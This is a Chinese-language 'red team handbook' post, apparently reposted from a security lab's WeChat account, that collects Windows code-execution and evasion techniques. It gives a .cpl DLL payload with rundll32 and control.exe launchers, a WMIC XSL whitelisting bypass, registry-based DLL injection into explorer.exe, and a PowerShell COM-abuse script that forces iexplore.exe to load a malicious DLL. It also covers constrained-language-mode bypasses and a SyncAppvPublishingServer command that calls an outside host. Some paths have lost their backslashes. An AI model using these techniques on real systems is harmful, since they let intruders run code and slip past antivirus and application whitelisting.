红队手册

  • A+
所属分类:安全文章



代码执行







使用控制面板文件(.cpl)文件来执行



CPL文件本质是Windows可执行性文件,但不属于可以直接独立运行的文件,可以由shell32.dll或者control.exe打开

item.cpl


// dllmain.cpp : Defines the entry point for the DLL application.#include "stdafx.h"#include <Windows.h>

//Cplappletextern "C" __declspec(dllexport) LONG Cplapplet(HWND hwndCpl,UINT msg,LPARAM lParam1,LPARAM lParam2){MessageBoxA(NULL, "Hey there, I am now your control panel item you know.", "Control Panel", 0);return 1;}

BOOL APIENTRY DllMain( HMODULE hModule,DWORD ul_reason_for_call,LPVOID lpReserved){switch (ul_reason_for_call){case DLL_PROCESS_ATTACH:{Cplapplet(NULL, NULL, NULL, NULL);}case DLL_THREAD_ATTACH:case DLL_THREAD_DETACH:case DLL_PROCESS_DETACH:break;}return TRUE;}


执行方式:

1、双击就可执行

2、通过rundll32 调用shell32来执行

rundll32 shell32, Control_RunDLL \VBOXSVRExperimentscpldoubleclickcpldoubleclickDebugcpldoubleclick.cpl

3、通过control.exe <pathtothe.cpl>






用wmic和xsl应用白名单的方式绕过杀软



Eval.xsl

<?xml version='1.0'?><stylesheetxmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"xmlns:user="placeholder"version="1.0"><output method="text"/><ms:script implements-prefix="user" language="JScript"><![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc");]]> </ms:script></stylesheet>cmd执行wmic os get /FORMAT:"evil.xsl"






将进程注入控制面板



通过更改控制面板的注册表,来将恶意的dll注入到explorer.exe文件中

控制面板注册表:

HKCUSoftwareMicrosoftWindowsCurrentVersionControl PanelCPLs

注入命令:

reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionControl 

PanelCPLs" /v spotless /d 

"C:labscplAddincplAddinx64ReleasecplAddin2.dll" /f






通过com滥用来强迫Iexplore.exe加载恶意dll



这个做法的前提需要iexplore.exe运行在目标系统


Code borrowed from https://github.com/nettitude/Invoke-

PowerThIEf/blob/master/Invoke-PowerThIEf.ps1 by Rob Maslen


$CLSID = "55555555-5555-5555-5555-555555555555"

Remove-Item -Recurse -Force -Path "HKCU:SoftwareClassesCLSID

{$CLSID}" -ErrorAction SilentlyContinue



path to the malicious DLL we want iexplore to load and execute


$payload = "\VBOXSVRExperimentsevilm64.dll"

New-Item -Path "HKCU:SoftwareClassesCLSID" -ErrorAction SilentlyContinue | Out-Null

New-Item -Path "HKCU:SoftwareClassesCLSID{$CLSID}" | Out-Null

New-Item -Path "HKCU:SoftwareClassesCLSID{$CLSID}InProcServer32" | Out-Null

New-Item -Path "HKCU:SoftwareClassesCLSID{$CLSID}ShellFolder" | 

Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}InProcServer32" -Name "(default)" -Value $Payload | Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}InProcServer32" -Name "ThreadingModel" -Value "Apartment" | Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}InProcServer32" -Name "LoadWithoutCOM" -Value "" | Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}ShellFolder" -Name "HideOnDesktop" -Value "" | Out-Null

New-ItemProperty -Path "HKCU:SoftwareClassesCLSID{$CLSID}ShellFolder" -Name "Attributes" -Value 0xf090013d -PropertyType DWORD | Out-Null



force iexplore to load the malicious DLL and execute it


$shellWinGuid = [System.Guid]::Parse("{9BA05972-F6A8-11CF-A442-00A0C90A8F39}")

$typeShwin = [System.Type]::GetTypeFromCLSID($shellWinGuid)

$shwin = [System.Activator]::CreateInstance($typeShwin) | ? {$_.fullname -match 'iexplore'} | Select-Object -First 1

$shWin.Navigate2("shell:::{$CLSID}", 2048)

还没有测试,见:https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques/blob/master/offensive-security/code-execution/forcing-iexplore.exe-to-load-a-malicious-dll-via-com-abuse.md







powershell绕过约束语言模式



约束语言模式:

是缓解PowerShell攻击的一种方式,能够阻止执行任意未签名的代码。当Device Guard或者AppLocker处于强制模式时,它是最实际有效的强制安全措施,因为未被策略允许的任何脚本或者模块都位于受限语言模式下,这严重限制了攻击者执行未签名的代码。

1、powershell内嵌powershell

$a=[powershell]::Create();$a.AddCommand('whoami');$a.Invoke()

2、poershell降低版本

通过:powershell -version 2来绕过限制







powershell中运行powershell



如果是在powershell运行受限制的环境中

1、用rundll32

rundll32.exe PowerShdll.dll,main

2、使用win10中的新方法SyncAppvPublishingServer,SyncAppvPublishingServer.exeandSyncAppvPublishingServer.vbs都可以执行任意命令

SyncAppvPublishingServer.vbs "Break; iwr http://10.0.0.5:443"



end



红队手册


本文始发于微信公众号(雷石安全实验室):红队手册

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: